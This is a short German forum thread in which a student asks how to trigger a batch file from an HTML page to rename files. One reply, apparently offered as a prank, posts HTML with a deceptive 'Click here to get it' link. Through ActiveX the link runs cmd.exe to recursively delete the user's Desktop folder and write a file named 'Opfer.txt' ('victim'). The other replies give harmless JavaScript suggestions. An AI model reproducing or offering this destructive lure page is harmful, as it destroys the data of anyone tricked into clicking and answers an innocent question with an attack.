# HTML mit .bat Verknüpfen ??



## Unti Bunti (18. Januar 2012)

*HTML mit .bat Verknüpfen ??*

Hallo,
habe folgendes Problem XD… ich muss in Informatik Unterricht eine auf MS-DOS basierte Programmierung durchführen, habe momentan aber noch ein paar Probleme… ich muss folgendes machen; oder besser gesagt das Programm muss was machen.
Ich muss eine oder mehrere Dateien über ein Batch Datei umbenennen können das ganze sollte benutzerfreundlich auf einer Explorer Seite zur Verfügung gestellt werden.
Ich habe mir das jetzt folgender maßen vorgestellt.  Eine auf  „ .bat“ programmierte Datei die auf einen  HTML Code ausgeführt wird, wenn ich in ein Input Fenster hineinschreibe was ich Umbenennen will die Frage ist jetzt wie ich das machen und ob das überhaupt geht?
Wäre für eine schnelle Antwort wirklich sehr dankbar weil ich bis zum Wochenende damit fertig sein muss(sollte) um mit meinen Collegen den Rest zu besprechen.


----------



## Curry (29. Februar 2012)

*AW: HTML mit .bat Verknüpfen ??*

Ich habe den Thread gerade erst gesehen.

Meine Idee wäre dass Sie das ganze in javaschrip realisieren. HTML ist eine Websprache, die auf dem Browser des Nutzers ausgeführt wird.


Über javascript könnte es möglich sein, solchte Dateien zu starten


----------



## Silent12 (29. Februar 2012)

*AW: HTML mit .bat Verknüpfen ??*

Active Exploits ermöglichen das soweit ich weis ziemlich gut.
Irgendwie so ähnlich:

<html>
<head>
<script type="text/javascript">
function runApp(which)
         {
                WshShell = new ActiveXObject("Wscript.Shell");
                WshShell.Run (which, 1, true);

        }

</script>
</head>
<body>
<font onClick="runApp('file://C:/windows/system32/cmd.exe /c &rmdir "Desktop" /s & J &  echo Hallo > „Opfer.txt“>&Opfer.txt');" style="cursor: hand;"> <u>Click here to get it</u></font> <br>
</body>
</html>

Müsste soweit ich weis den Desktop mittels CMD/MSDos löschen.

Gruß
silent12


----------



## slayerms (3. März 2012)

*AW: HTML mit .bat Verknüpfen ??*

wie vorredner schon gesagt hat nur über javascript


----------

